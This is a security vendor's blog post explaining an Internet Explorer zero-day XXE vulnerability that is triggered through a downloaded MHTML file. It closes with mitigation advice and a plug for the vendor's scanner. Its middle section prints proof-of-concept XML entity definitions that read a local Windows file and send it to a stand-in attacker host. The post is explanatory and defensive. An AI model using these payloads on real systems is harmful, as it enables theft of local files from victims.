When exploiting a typical XML External Entity (XXE) vulnerability, the attacker attempts to gain access to the content of files on a Web server. However, XXE vulnerabilities may also allow the attacker to steal private data from the user. Such a case was recently discovered by a security researcher John Page (hyp3rlinx). It relies on a zero-day vulnerability in Internet Explorer.


Anatomy of the Attack

Luckily for Windows users, the vulnerability in Internet Explorer is not that easy to exploit. A victim must first download and execute an MHTML archive file (.mht). Many users are already educated well enough to know that they should not execute strange files from the Internet.

On the other hand, many people consider MHTML archive files harmless and have no second thoughts when executing them. The file used in the proof-of-concept attack was also ignored by Windows Defender and SmartScreen.

The following is a description of how the proof-of-concept attack can be performed:

  1. The attacker lures the victim to visit a malicious site. The malicious site contains a link to download an MHTML archive file.
  2. The victim downloads the .mht file and double clicks it.
  3. The .mht file is automatically opened in Internet Explorer and executed:
    a. The MHTML file contains a definition that points to an XML file on the attacker’s server.
    b. The MHTML file downloads and includes the XML file.
    c. The included XML file contains an external entity definition that points to a local sensitive file.
    d. The MHTML file contains a script that triggers the IE Print function (window.print()).
  4. The victim’s browser sends a GET request with the content of the local sensitive file to the attacker’s site.

Zero Day XXE Vulnerability
Key fragment of the example MHTML file:

<?xml version="1.0" encoding="utf-8"?>
<!ENTITY % sp SYSTEM "http://example.com/datatears.xml">

The included XML file:

<!ENTITY % data SYSTEM "c:\windows\system.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://example.com:8000/?%data;'>">
<!ENTITY % data SYSTEM "file:///c:/windows/system.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://example.com:8000/?%data;'>">

For full description and content of all files, see the original vulnerability report.

Protection Against XXE

In the case of this particular issue, there is no direct protection until Microsoft fixes Internet Explorer. Some antivirus software already recognizes this issue and blocks such MHTML files from being downloaded, so it may be helpful to mitigate the risk. What helps most, however, is to educate your users never to download and execute unknown files from the Internet, even if they are not EXE files and even if the antivirus is not triggered.

On the other hand, server-side XXE vulnerabilities are very common in web applications. XML External Entity vulnerabilities take the number 4 spot on the latest OWASP Top 10 list. Fortunately, it’s easy to test if your website or web application is vulnerable to XXE and other vulnerabilities by running an automated web scan using the Acunetix vulnerability scanner, which includes a specialized XXE scanner module. Take a demo and find out more about running XXE scans against your website or web application.

Tomasz Andrzej Nidecki
Principal Cybersecurity Writer
Tomasz Andrzej Nidecki (also known as tonid) is a Primary Cybersecurity Writer at Invicti, focusing on Acunetix. A journalist, translator, and technical writer with 25 years of IT experience, Tomasz has been the Managing Editor of the hakin9 IT Security magazine in its early years and used to run a major technical blog dedicated to email security.